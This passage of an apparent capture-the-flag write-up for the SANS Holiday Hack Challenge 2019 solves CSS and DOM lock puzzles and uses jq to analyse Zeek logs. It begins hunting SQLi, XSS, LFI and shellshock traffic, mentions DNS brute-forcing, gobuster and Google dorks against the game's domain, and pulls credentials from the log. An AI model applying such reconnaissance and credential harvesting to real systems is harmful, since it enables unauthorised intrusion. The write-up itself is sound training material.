&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;hologram&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;perspective&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;9000&lt;/span&gt;&lt;span class="kt"&gt;px&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;width&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;150&lt;/span&gt;&lt;span class="kt"&gt;px&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;height&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="kt"&gt;px&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;border-radius&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;20&lt;/span&gt;&lt;span class="kt"&gt;px&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;transition&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="k"&gt;perspective&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="kt"&gt;s&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="lock_6_hologram.png" class="align-center" src="/images/sans-christmas-challenge-2019/lock_6_hologram.png" /&gt;
&lt;p&gt;We can make out the code: &lt;code&gt;6O0X1TVU&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="7"&gt;
&lt;li&gt;The font you're seeing is pretty slick, but this lock's code was my first
pick.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Let's look at the font attributes in the CSS of the page:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;instructions&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
 &lt;span class="k"&gt;font-family&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;1SWUSZZ2&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Beth Ellen&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;cursive&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We get the following code: &lt;code&gt;1SWUSZZ2&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="8"&gt;
&lt;li&gt;In the event that the .eggs go bad, you must figure out who will be sad.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Let's see what event is linked to this &lt;code&gt;.eggs&lt;/code&gt; object:&lt;/p&gt;
&lt;img alt="lock_8_event.png" class="align-center" src="/images/sans-christmas-challenge-2019/lock_8_event.png" /&gt;
&lt;p&gt;The code is &lt;code&gt;VERONICA&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="9"&gt;
&lt;li&gt;This next code will be unredacted, but only when all the chakras are
:active.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;code&gt;:active&lt;/code&gt; is a CSS attribute, let's look for &lt;code&gt;chakra&lt;/code&gt; in the CSS:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nt"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;chakra&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;nth-child&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nt"&gt;1&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;active&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;after&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;77&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="nt"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;chakra&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;nth-child&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nt"&gt;2&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;active&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;after&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;QS&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="nt"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;chakra&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;nth-child&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nt"&gt;3&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;active&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;after&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;X&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="nt"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;chakra&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;nth-child&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nt"&gt;4&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;active&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;after&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;HI&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="nt"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;chakra&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;nth-child&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nt"&gt;5&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;active&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nd"&gt;after&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;9&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We get the next code: &lt;code&gt;77QSXHI9&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="10"&gt;
&lt;li&gt;Oh, no! This lock's out of commission! Pop off the cover and locate what's
missing.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Come again? Let's look at the hint:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Use the DOM tree viewer to examine this lock. you can search for items in the
DOM using this view.&lt;/li&gt;
&lt;li&gt;You can click and drag elements to reposition them in the DOM tree.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Alright, let's use the DOM tree to remove the cover, by dragging and dropping
the cover element:&lt;/p&gt;
&lt;img alt="lock_10_no_cover.png" class="align-center" src="/images/sans-christmas-challenge-2019/lock_10_no_cover.png" /&gt;
&lt;p&gt;There seems to be a code printed on the PCB: &lt;code&gt;KD29XJ37&lt;/code&gt;. But there seems
to be missing three elements on the PCB. If we look around the CSS file, we
see that three elements are linked to the lock #10 &lt;code&gt;c10&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;locks&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nt"&gt;li&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;lock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;c10&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;component&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;macaroni&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;background&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;url&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sx"&gt;../../images/mac.png&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="kc"&gt;no-repeat&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;locks&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nt"&gt;li&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;lock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;c10&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;component&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;swab&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;background&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;url&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sx"&gt;../../images/qtip.png&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="kc"&gt;no-repeat&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;locks&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nt"&gt;li&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;lock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;c10&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;component&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;gnome&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;background&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;url&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sx"&gt;../../images/gnome.png&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="kc"&gt;no-repeat&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's look for these elements, &lt;code&gt;macaroni&lt;/code&gt;, &lt;code&gt;swab&lt;/code&gt;, and
&lt;code&gt;gnome&lt;/code&gt;, and drag and drop them on the PCB:&lt;/p&gt;
&lt;img alt="lock_10_elements.png" class="align-center" src="/images/sans-christmas-challenge-2019/lock_10_elements.png" /&gt;
&lt;p&gt;Now, let's input the code, and unlock the final lock, opening the crate:&lt;/p&gt;
&lt;img alt="crate_open.png" class="align-center" src="/images/sans-christmas-challenge-2019/crate_open.png" /&gt;
&lt;p&gt;The villain is the Tooth Fairy &lt;strong&gt;gasp&lt;/strong&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-12"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id40"&gt;Objective 12:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="wunorse-openslae-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id41"&gt;Wunorse Openslae's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Some JSON files can get quite busy.&lt;/span&gt;
&lt;span class="go"&gt;There&amp;#39;s lots to see and do.&lt;/span&gt;
&lt;span class="go"&gt;Does C&amp;amp;C lurk in our data?&lt;/span&gt;
&lt;span class="go"&gt;JQ&amp;#39;s the tool for you!&lt;/span&gt;

&lt;span class="go"&gt;-Wunorse Openslae&lt;/span&gt;

&lt;span class="go"&gt;Identify the destination IP address with the longest connection duration&lt;/span&gt;
&lt;span class="go"&gt;using the supplied Zeek logfile. Run runtoanswer to submit your answer.&lt;/span&gt;

&lt;span class="gp"&gt;elf@a71d36bc6488:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we must look for the connection with the longest duration. Let's take
a look at this log file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@a71d36bc6488:~$&lt;/span&gt; ls
&lt;span class="go"&gt;conn.log&lt;/span&gt;
&lt;span class="gp"&gt;elf@94a92f24ac33:~$&lt;/span&gt; head -n &lt;span class="m"&gt;3&lt;/span&gt; conn.log
&lt;span class="go"&gt;{&amp;quot;ts&amp;quot;:&amp;quot;2019-04-04T20:34:24.698965Z&amp;quot;,&amp;quot;uid&amp;quot;:&amp;quot;CAFvAu2l50Km67tSP5&amp;quot;,&amp;quot;id.orig_h&amp;quot;:&amp;quot;192.168.144.130&amp;quot;,&amp;quot;id.orig_p&amp;quot;:64277,&amp;quot;id.resp_h&amp;quot;:&amp;quot;192.168.144.2&amp;quot;,&amp;quot;id.resp_p&amp;quot;:53,&amp;quot;proto&amp;quot;:&amp;quot;udp&amp;quot;,&amp;quot;service&amp;quot;:&amp;quot;dns&amp;quot;,&amp;quot;duration&amp;quot;:0.320463,&amp;quot;orig_bytes&amp;quot;:94,&amp;quot;resp_bytes&amp;quot;:316,&amp;quot;conn_state&amp;quot;:&amp;quot;SF&amp;quot;,&amp;quot;missed_bytes&amp;quot;:0,&amp;quot;history&amp;quot;:&amp;quot;Dd&amp;quot;,&amp;quot;orig_pkts&amp;quot;:2,&amp;quot;orig_ip_bytes&amp;quot;:150,&amp;quot;resp_pkts&amp;quot;:2,&amp;quot;resp_ip_bytes&amp;quot;:372}&lt;/span&gt;
&lt;span class="go"&gt;{&amp;quot;ts&amp;quot;:&amp;quot;2019-04-04T20:41:01.862738Z&amp;quot;,&amp;quot;uid&amp;quot;:&amp;quot;CCuAk24L1kIclVKz4l&amp;quot;,&amp;quot;id.orig_h&amp;quot;:&amp;quot;192.168.144.130&amp;quot;,&amp;quot;id.orig_p&amp;quot;:55106,&amp;quot;id.resp_h&amp;quot;:&amp;quot;192.168.144.2&amp;quot;,&amp;quot;id.resp_p&amp;quot;:53,&amp;quot;proto&amp;quot;:&amp;quot;udp&amp;quot;,&amp;quot;service&amp;quot;:&amp;quot;dns&amp;quot;,&amp;quot;duration&amp;quot;:0.000602,&amp;quot;orig_bytes&amp;quot;:47,&amp;quot;resp_bytes&amp;quot;:63,&amp;quot;conn_state&amp;quot;:&amp;quot;SF&amp;quot;,&amp;quot;missed_bytes&amp;quot;:0,&amp;quot;history&amp;quot;:&amp;quot;Dd&amp;quot;,&amp;quot;orig_pkts&amp;quot;:1,&amp;quot;orig_ip_bytes&amp;quot;:75,&amp;quot;resp_pkts&amp;quot;:1,&amp;quot;resp_ip_bytes&amp;quot;:91}&lt;/span&gt;
&lt;span class="go"&gt;{&amp;quot;ts&amp;quot;:&amp;quot;2019-04-04T20:42:09.277476Z&amp;quot;,&amp;quot;uid&amp;quot;:&amp;quot;CRRCaj4bvzUJRRpmR6&amp;quot;,&amp;quot;id.orig_h&amp;quot;:&amp;quot;192.168.144.130&amp;quot;,&amp;quot;id.orig_p&amp;quot;:59679,&amp;quot;id.resp_h&amp;quot;:&amp;quot;192.168.144.2&amp;quot;,&amp;quot;id.resp_p&amp;quot;:53,&amp;quot;proto&amp;quot;:&amp;quot;udp&amp;quot;,&amp;quot;service&amp;quot;:&amp;quot;dns&amp;quot;,&amp;quot;duration&amp;quot;:0.000923,&amp;quot;orig_bytes&amp;quot;:34,&amp;quot;resp_bytes&amp;quot;:34,&amp;quot;conn_state&amp;quot;:&amp;quot;SF&amp;quot;,&amp;quot;missed_bytes&amp;quot;:0,&amp;quot;history&amp;quot;:&amp;quot;Dd&amp;quot;,&amp;quot;orig_pkts&amp;quot;:1,&amp;quot;orig_ip_bytes&amp;quot;:62,&amp;quot;resp_pkts&amp;quot;:1,&amp;quot;resp_ip_bytes&amp;quot;:62}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, the &lt;code&gt;conn.log&lt;/code&gt; file is full of JSON data, one object per line, which
has the following interesting attributes:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;id.resp_h&lt;/code&gt;, the destination IP&lt;/li&gt;
&lt;li&gt;&lt;code&gt;duration&lt;/code&gt;, the duration of the connection&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As the console suggests, we can use &lt;code&gt;jq&lt;/code&gt; to parse this data. Let's create
a &lt;code&gt;jq&lt;/code&gt; filter that will give us the destination IP with the longest
connection duration. You can use &lt;a class="reference external" href="https://stedolan.github.io/jq/manual/"&gt;this guide&lt;/a&gt;
to create your own filter.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@94a92f24ac33:~$&lt;/span&gt; jq -s &lt;span class="s1"&gt;&amp;#39;[.[] | {duration, &amp;quot;id.resp_h&amp;quot;}] | sort_by(.duration) | .[-1].&amp;quot;id.resp_h&amp;quot;&amp;#39;&lt;/span&gt; conn.log
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's break this down:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
jq -s [...] conn.log
&lt;/pre&gt;
&lt;p&gt;This calls &lt;code&gt;jq&lt;/code&gt; and tells it to treat the data in &lt;code&gt;conn.log&lt;/code&gt; as a
stream of data (since we have one JSON object per line, and not, say, a full
JSON object in the file).&lt;/p&gt;
&lt;pre class="literal-block"&gt;
[.[] | {duration, &amp;quot;id.resp_h&amp;quot;}]
&lt;/pre&gt;
&lt;p&gt;We create a list of JSON objects, based on the attributes &lt;code&gt;duration&lt;/code&gt; and
&lt;code&gt;id.resp_h&lt;/code&gt;. Note that we had to put the latter between double quotes,
because of the dot in the attribute's name.&lt;/p&gt;
&lt;pre class="literal-block"&gt;
| sort_by(.duration)
&lt;/pre&gt;
&lt;p&gt;We get the created list, and sort it by the &lt;code&gt;duration&lt;/code&gt; attribute.&lt;/p&gt;
&lt;pre class="literal-block"&gt;
| .[-1].&amp;quot;id.resp_h&amp;quot;
&lt;/pre&gt;
&lt;p&gt;We get the last element of the list (index -1) and query its &lt;code&gt;id.resp_h&lt;/code&gt;
attribute.&lt;/p&gt;
&lt;p&gt;Let's give this a go:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@94a92f24ac33:~$&lt;/span&gt; jq -s &lt;span class="s1"&gt;&amp;#39;[.[] | {duration, &amp;quot;id.resp_h&amp;quot;}] | sort_by(.duration) | .[-1].&amp;quot;id.resp_h&amp;quot;&amp;#39;&lt;/span&gt; conn.log
&lt;span class="go"&gt;&amp;quot;13.107.21.200&amp;quot;&lt;/span&gt;
&lt;span class="gp"&gt;elf@94a92f24ac33:~$&lt;/span&gt; runtoanswer
&lt;span class="go"&gt;Loading, please wait......&lt;/span&gt;



&lt;span class="go"&gt;What is the destination IP address with the longes connection duration? 13.107.21.200&lt;/span&gt;



&lt;span class="go"&gt;Thank you for your analysis, you are spot-on.&lt;/span&gt;
&lt;span class="go"&gt;I would have been working on that until the early dawn.&lt;/span&gt;
&lt;span class="go"&gt;Now that you know the features of jq,&lt;/span&gt;
&lt;span class="go"&gt;You&amp;#39;ll be able to answer other challenges too.&lt;/span&gt;

&lt;span class="go"&gt;-Wunorse Openslae&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="filter-out-poisoned-sources-of-weather-data"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id42"&gt;Filter Out Poisoned Sources of Weather Data&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Inside the Sleigh Shop, we find the evil Tooth Fairy:&lt;/p&gt;
&lt;img alt="toothfairy.png" class="align-center" src="/images/sans-christmas-challenge-2019/toothfairy.png" /&gt;
&lt;p&gt;&lt;em&gt;The Tooth Fairy says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I’m the Tooth Fairy, the mastermind behind the plot to destroy the holiday
season.&lt;/p&gt;
&lt;p&gt;I hate how Santa is so beloved, but only works one day per year!&lt;/p&gt;
&lt;p&gt;He has all of the resources of the North Pole and the elves to help him
too.&lt;/p&gt;
&lt;p&gt;I run a solo operation, toiling year-round collecting deciduous bicuspids
and more from children.&lt;/p&gt;
&lt;p&gt;But I get nowhere near the gratitude that Santa gets. He needs to share his
holiday resources with the rest of us!&lt;/p&gt;
&lt;p&gt;But, although you found me, you haven’t foiled my plot!&lt;/p&gt;
&lt;p&gt;Santa’s sleigh will NOT be able to find its way.&lt;/p&gt;
&lt;p&gt;I will get my revenge and respect!&lt;/p&gt;
&lt;p&gt;I want my own holiday, National Tooth Fairy Day, to be the most popular
holiday on the calendar!!!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="wunorse_openslaer.png" class="align-center" src="/images/sans-christmas-challenge-2019/wunorse_openslae.png" /&gt;
&lt;p&gt;&lt;em&gt;Wunorse Openslae says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hey, you know what? We've got a crisis here.&lt;/p&gt;
&lt;p&gt;You see, Santa's flight route is planned by a complex set of machine
learning algorithms which use available weather data.&lt;/p&gt;
&lt;p&gt;All the weather stations are reporting severe weather to Santa's Sleigh. I
think someone might be forging intentionally false weather data!&lt;/p&gt;
&lt;p&gt;I'm so flummoxed I can't even remember how to login!&lt;/p&gt;
&lt;p&gt;Hmm... Maybe the Zeek http.log could help us.&lt;/p&gt;
&lt;p&gt;I worry about LFI, XSS, and SQLi in the Zeek log - oh my!&lt;/p&gt;
&lt;p&gt;And I'd be shocked if there weren't some shell stuff in there too.&lt;/p&gt;
&lt;p&gt;I'll bet if you pick through, you can find some naughty data from naughty
hosts and block it in the firewall.&lt;/p&gt;
&lt;p&gt;If you find a log entry that definitely looks bad, try pivoting off other
unusual attributes in that entry to find more bad IPs.&lt;/p&gt;
&lt;p&gt;The sleigh's machine learning device (SRF) needs most of the malicious IPs
blocked in order to calculate a good route.&lt;/p&gt;
&lt;p&gt;Try not to block many legitimate weather station IPs as that could also
cause route calculation failure.&lt;/p&gt;
&lt;p&gt;Remember, when looking at JSON data, jq is the tool for you!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Alright, let's download this &lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/http.log.gz"&gt;log file&lt;/a&gt;
and take a look inside.&lt;/p&gt;
&lt;p&gt;So, this file contains one big JSON object, and we must find traces of SQL
injections, XSS, local file inclusion, and shell shock exploits. When we have
identified at least 100 bad IPs, we can block them in the &lt;a class="reference external" href="https://srf.elfu.org/"&gt;Sleigh Route Finder&lt;/a&gt; so that Santa can calculate the correct route for
his present delivery.&lt;/p&gt;
&lt;p&gt;But first, how can we log into the Sleigh Route Finder website? We don't have
any credentials and Wunorse don't remember them. If we take a look at the
&lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf"&gt;quick start guide&lt;/a&gt;
we decrypted earlier, we find an interesting piece of information:&lt;/p&gt;
&lt;blockquote&gt;
The default login credentials should be changed on startup and can be found
in the readme in the ElfU Research Labs git repository.&lt;/blockquote&gt;
&lt;p&gt;I first spent some time trying to find this git repository. I performed DNS
bruteforce against the elfu.org domain, but didn't find anything interesting.
I also try to use &lt;a class="reference external" href="https://github.com/OJ/gobuster/"&gt;gobuster&lt;/a&gt; against the
&lt;a class="reference external" href="https://srf.elfu.org"&gt;https://srf.elfu.org&lt;/a&gt; website, but also to no avail. I then tried several
&lt;a class="reference external" href="https://www.owasp.org/index.php/Conduct_search_engine_discovery/reconnaissance_for_information_leakage_(OTG-INFO-001)"&gt;Google Dorks&lt;/a&gt;
to try and find this mysterious git repository, but the only thing I found
was this &lt;a class="reference external" href="https://downloads.elfu.org/LetterOfWintryMagic.pdf"&gt;weird letter&lt;/a&gt;
of Wintry Magic, that I could make no sense of.&lt;/p&gt;
&lt;p&gt;I then thought that maybe we could try to find login information in the Zeek
log file. Indeed, the different events have a &lt;code&gt;username&lt;/code&gt; and a
&lt;code&gt;password&lt;/code&gt; attribute. Maybe the login information we're looking for is
there? Let's build a &lt;code&gt;jq&lt;/code&gt; filter to find these information:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; jq &lt;span class="s1"&gt;&amp;#39;.[] | select(.username != &amp;quot;-&amp;quot;) | {username, password}&amp;#39;&lt;/span&gt; http.log
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;q1ki9&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;servlet&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;support&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;admin&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;username&amp;quot;: &amp;quot;Admin&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
